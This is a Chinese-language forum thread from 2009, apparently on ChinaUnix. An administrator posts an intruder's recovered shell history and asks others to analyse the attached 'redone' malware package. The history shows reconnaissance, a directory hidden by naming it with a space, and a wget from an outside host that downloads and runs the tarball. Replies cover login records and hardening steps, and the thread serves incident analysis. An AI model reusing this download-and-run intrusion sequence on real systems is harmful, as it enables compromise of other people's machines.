论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2009-02-25 10:56 |只看该作者 |倒序浏览

w
cat /etc/hosts
passwd
uname -a
ls
cd /tmp
ls
cd /var/tmp
ls
ls -a
mkdir " "
cd " "
ls
wget His_url.hisweb.domain/redone.tar.gz
tar xvf redone.tar.gz
cd redone
ls
./config premiant 31337
./fuck
./run
/sbin/ifconfig -a |grep inet | wc -l
/sbin/ifconfig -a | grep inet

附件中为readon.tar.gz
闯入者操作熟练，但是没有清空 histroy 文件。
mkdir " " 后普通ls 还真看不到
另外可以看到闯入着的常用命令，对于常用的命令都做了替换，对于 w uname 改名并设立报警命令
最大的弱点还是还是系统存在弱密码，继续加固中。。。

这个redone 包大虾们帮忙分析下

[ 本帖最后由 Yerba_ 于 2009-2-25 11:04 编辑 ]

redone.tar.gz

460 KB, 下载次数: 68

文库|博客

flb_2001

腰缠万贯

论坛徽章:: 0

2楼 [报告]

发表于 2009-02-25 12:00 |只看该作者

现在系统有异常吗？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

Yerba_

白手起家

论坛徽章:: 0

3楼 [报告]

发表于 2009-02-25 12:31 |只看该作者

暂时没发现什么异常，

last
username pts/1       acad0581.ipt.aol Mon Feb 23 20:48 - 20:50  (00:01)
username pts/0       acad0581.ipt.aol Mon Feb 23 20:30 - 20:37  (00:07)
username pts/0       inspire.thecompg Mon Feb 23 20:05 - 20:08  (00:03)

总共登录的时间不长  最早的可能是扫描发起的机器？然后修改了密码
再更换到另一个ip登录，最后一次时间不长，看起来像是最后测试

那个 redone 的包大致看了下，主体是那个proc ，但是从ps中看到的是 httpd
昨天通过lastlog 看到不正常登录后
首先通过 ps -ef | grep username 得到 pid kill掉后一直没特别的现象。
也许当时应该多 trace 仔细分析下，现在包在这里了供各位分析

已经将 .bash_history 加了 i 附加权限仔细检查系统不使用的用户
passwd -l 锁定
关闭 /sbin的一般用户访问关闭